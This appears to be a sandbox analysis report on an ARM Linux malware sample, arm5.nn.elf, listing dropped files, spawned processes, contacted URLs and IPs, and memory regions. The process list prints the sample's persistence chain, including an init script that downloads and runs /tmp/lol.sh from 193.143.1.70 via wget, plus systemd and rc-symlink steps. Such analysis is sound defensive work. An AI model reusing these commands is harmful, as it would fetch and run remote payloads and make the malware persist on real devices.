Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
arm5.nn.elf
|
ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
|
initial sample
|
 |
|
|
/etc/init.d/arm5.nn.elf
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/init.d/system
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/profile
|
ASCII text
|
dropped
|
|
|
|
/etc/rc.local
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/boot/bootcmd
|
ASCII text
|
dropped
|
||
|
/etc/inittab
|
ASCII text
|
dropped
|
||
|
/etc/motd
|
ASCII text
|
dropped
|
||
|
/etc/systemd/system/custom.service
|
ASCII text
|
dropped
|
||
|
/memfd:snapd-env-generator (deleted)
|
ASCII text
|
dropped
|
||
|
/tmp/qemu-open.79Kisc (deleted)
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
/tmp/arm5.nn.elf
|
/tmp/arm5.nn.elf
|
||
|
/tmp/arm5.nn.elf
|
-
|
||
|
/tmp/arm5.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "systemctl enable custom.service >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/systemctl
|
systemctl enable custom.service
|
||
|
/tmp/arm5.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/system
|
||
|
/tmp/arm5.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/system /etc/rcS.d/S99system
|
||
|
/tmp/arm5.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm5.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm5.nn.elf'\n /tmp/arm5.nn.elf
&\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping
arm5.nn.elf'\n killall arm5.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0
{start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm5.nn.elf"
|
||
|
/tmp/arm5.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/arm5.nn.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/arm5.nn.elf
|
||
|
/tmp/arm5.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/mkdir
|
mkdir -p /etc/rc.d
|
||
|
/tmp/arm5.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/arm5.nn.elf /etc/rc.d/S99arm5.nn.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/arm5.nn.elf /etc/rc.d/S99arm5.nn.elf
|
||
|
/tmp/arm5.nn.elf
|
-
|
||
|
/tmp/arm5.nn.elf
|
-
|
||
|
/tmp/arm5.nn.elf
|
-
|
||
|
/tmp/arm5.nn.elf
|
-
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
|
||
|
/usr/libexec/gsd-housekeeping
|
/usr/libexec/gsd-housekeeping
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
There are 41 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://193.143.1.70/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbi
|
unknown
|
||
|
http://193.143.1.70/curl.sh
|
unknown
|
||
|
http://193.143.1.70/lol.sh
|
unknown
|
||
|
http://193.143.1.70/
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
110.243.254.87
|
unknown
|
China
|
||
|
169.236.3.66
|
unknown
|
United States
|
||
|
215.12.102.116
|
unknown
|
United States
|
||
|
140.231.81.191
|
unknown
|
Germany
|
||
|
96.7.175.102
|
unknown
|
United States
|
||
|
204.122.227.206
|
unknown
|
United States
|
||
|
140.216.33.191
|
unknown
|
United States
|
||
|
164.6.20.237
|
unknown
|
United Kingdom
|
||
|
16.51.205.197
|
unknown
|
United States
|
||
|
83.106.243.46
|
unknown
|
United Kingdom
|
||
|
72.85.253.31
|
unknown
|
United States
|
||
|
190.127.100.196
|
unknown
|
Colombia
|
||
|
51.46.204.39
|
unknown
|
United States
|
||
|
208.20.95.170
|
unknown
|
United States
|
||
|
76.48.52.175
|
unknown
|
United States
|
||
|
105.63.213.115
|
unknown
|
Kenya
|
||
|
202.7.154.88
|
unknown
|
Australia
|
||
|
158.46.21.58
|
unknown
|
Russian Federation
|
||
|
216.238.33.76
|
unknown
|
United States
|
||
|
78.126.23.174
|
unknown
|
France
|
||
|
2.64.241.254
|
unknown
|
Sweden
|
||
|
71.13.22.237
|
unknown
|
United States
|
||
|
21.12.207.51
|
unknown
|
United States
|
||
|
144.47.163.127
|
unknown
|
United States
|
||
|
30.168.226.247
|
unknown
|
United States
|
||
|
217.146.137.32
|
unknown
|
Germany
|
||
|
201.194.72.12
|
unknown
|
Costa Rica
|
||
|
65.144.153.197
|
unknown
|
United States
|
||
|
77.234.228.7
|
unknown
|
Slovakia (SLOVAK Republic)
|
||
|
32.8.155.4
|
unknown
|
United States
|
||
|
198.104.189.85
|
unknown
|
United States
|
||
|
129.255.162.95
|
unknown
|
United States
|
||
|
25.218.125.200
|
unknown
|
United Kingdom
|
||
|
34.245.219.170
|
unknown
|
United States
|
||
|
75.5.150.77
|
unknown
|
United States
|
||
|
200.237.60.139
|
unknown
|
Brazil
|
||
|
91.182.86.237
|
unknown
|
Belgium
|
||
|
135.208.123.47
|
unknown
|
United States
|
||
|
80.226.183.23
|
unknown
|
Germany
|
||
|
47.15.216.19
|
unknown
|
India
|
||
|
222.110.142.220
|
unknown
|
Korea Republic of
|
||
|
80.66.0.78
|
unknown
|
Germany
|
||
|
66.112.189.207
|
unknown
|
Canada
|
||
|
99.122.53.27
|
unknown
|
United States
|
||
|
87.98.56.40
|
unknown
|
Estonia
|
||
|
184.247.237.58
|
unknown
|
United States
|
||
|
212.243.233.130
|
unknown
|
Switzerland
|
||
|
92.109.61.39
|
unknown
|
Netherlands
|
||
|
92.229.24.113
|
unknown
|
Germany
|
||
|
192.217.115.254
|
unknown
|
United States
|
||
|
14.153.7.35
|
unknown
|
China
|
||
|
61.208.217.212
|
unknown
|
Japan
|
||
|
124.83.6.111
|
unknown
|
Philippines
|
||
|
190.222.204.242
|
unknown
|
Peru
|
||
|
49.31.46.28
|
unknown
|
Korea Republic of
|
||
|
18.71.238.137
|
unknown
|
United States
|
||
|
80.66.129.208
|
unknown
|
Belgium
|
||
|
143.29.11.101
|
unknown
|
United States
|
||
|
183.123.243.222
|
unknown
|
Korea Republic of
|
||
|
176.133.181.147
|
unknown
|
France
|
||
|
76.186.176.220
|
unknown
|
United States
|
||
|
193.143.1.70
|
unknown
|
unknown
|
||
|
109.133.209.242
|
unknown
|
Belgium
|
||
|
178.212.100.8
|
unknown
|
Ukraine
|
||
|
220.141.255.117
|
unknown
|
Taiwan; Republic of China (ROC)
|
||
|
221.161.214.153
|
unknown
|
Korea Republic of
|
||
|
135.123.70.107
|
unknown
|
United States
|
||
|
221.241.56.158
|
unknown
|
Japan
|
||
|
24.103.189.15
|
unknown
|
United States
|
||
|
122.36.21.0
|
unknown
|
Korea Republic of
|
||
|
104.94.168.92
|
unknown
|
United States
|
||
|
113.117.152.37
|
unknown
|
China
|
||
|
40.116.88.23
|
unknown
|
United States
|
||
|
192.56.161.87
|
unknown
|
United States
|
||
|
162.177.148.113
|
unknown
|
United States
|
||
|
5.64.168.142
|
unknown
|
United Kingdom
|
||
|
35.251.213.243
|
unknown
|
United States
|
||
|
122.180.160.27
|
unknown
|
India
|
||
|
149.54.59.77
|
unknown
|
Afghanistan
|
||
|
173.246.23.16
|
unknown
|
Canada
|
||
|
3.103.84.182
|
unknown
|
United States
|
||
|
207.68.180.237
|
unknown
|
United States
|
||
|
57.220.65.243
|
unknown
|
Belgium
|
||
|
99.246.45.214
|
unknown
|
Canada
|
||
|
29.69.110.195
|
unknown
|
United States
|
||
|
26.8.142.168
|
unknown
|
United States
|
||
|
191.160.122.17
|
unknown
|
Brazil
|
||
|
107.96.210.224
|
unknown
|
United States
|
||
|
85.172.210.84
|
unknown
|
Russian Federation
|
||
|
169.144.189.36
|
unknown
|
United States
|
||
|
43.36.161.142
|
unknown
|
Japan
|
||
|
192.80.101.224
|
unknown
|
United States
|
||
|
55.229.171.148
|
unknown
|
United States
|
||
|
43.244.215.20
|
unknown
|
Japan
|
||
|
51.53.14.94
|
unknown
|
United Kingdom
|
||
|
132.233.196.84
|
unknown
|
United States
|
||
|
189.36.215.137
|
unknown
|
Brazil
|
||
|
181.64.38.122
|
unknown
|
Peru
|
||
|
110.48.155.75
|
unknown
|
China
|
||
|
150.141.35.104
|
unknown
|
United States
|
There are 90 hidden IPs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7f723c032000
|
page execute read
|
|
||
|
7f723c032000
|
page execute read
|
|
||
|
7f734409c000
|
page read and write
|
|||
|
7f73434a0000
|
page read and write
|
|||
|
7f734432a000
|
page read and write
|
|||
|
7f733c021000
|
page read and write
|
|||
|
7f7344859000
|
page read and write
|
|||
|
7f723c044000
|
page read and write
|
|||
|
7f7344496000
|
page read and write
|
|||
|
7f733bfff000
|
page read and write
|
|||
|
7f7343ca8000
|
page read and write
|
|||
|
7f734409c000
|
page read and write
|
|||
|
559669279000
|
page execute read
|
|||
|
7f723c03b000
|
page read and write
|
|||
|
55966b4e8000
|
page read and write
|
|||
|
55966c0f3000
|
page read and write
|
|||
|
7f723c03f000
|
page read and write
|
|||
|
5596694ca000
|
page read and write
|
|||
|
7f7344678000
|
page read and write
|
|||
|
7f7344307000
|
page read and write
|
|||
|
7f73434a0000
|
page read and write
|
|||
|
7f7343d3a000
|
page read and write
|
|||
|
7f733c021000
|
page read and write
|
|||
|
7ffe444ee000
|
page read and write
|
|||
|
7f7344859000
|
page read and write
|
|||
|
55966c0f3000
|
page read and write
|
|||
|
7ffe4455d000
|
page execute read
|
|||
|
7ffe4455d000
|
page execute read
|
|||
|
7f7344982000
|
page read and write
|
|||
|
7f73449eb000
|
page read and write
|
|||
|
7f734432a000
|
page read and write
|
|||
|
7f7344982000
|
page read and write
|
|||
|
7f7344496000
|
page read and write
|
|||
|
5596694d3000
|
page read and write
|
|||
|
7f73449a6000
|
page read and write
|
|||
|
7f7344307000
|
page read and write
|
|||
|
7f733bfff000
|
page read and write
|
|||
|
55966b4d1000
|
page execute and read and write
|
|||
|
7f7344678000
|
page read and write
|
|||
|
55966b4e8000
|
page read and write
|
|||
|
5596694ca000
|
page read and write
|
|||
|
7f723c03b000
|
page read and write
|
|||
|
7f73449a6000
|
page read and write
|
|||
|
7f723c03f000
|
page read and write
|
|||
|
7f7343d3a000
|
page read and write
|
|||
|
7f73449eb000
|
page read and write
|
|||
|
5596694d3000
|
page read and write
|
|||
|
559669279000
|
page execute read
|
|||
|
55966b4d1000
|
page execute and read and write
|
|||
|
7ffe444ee000
|
page read and write
|
|||
|
7f7343ca8000
|
page read and write
|
There are 41 hidden memdumps, click here to show them.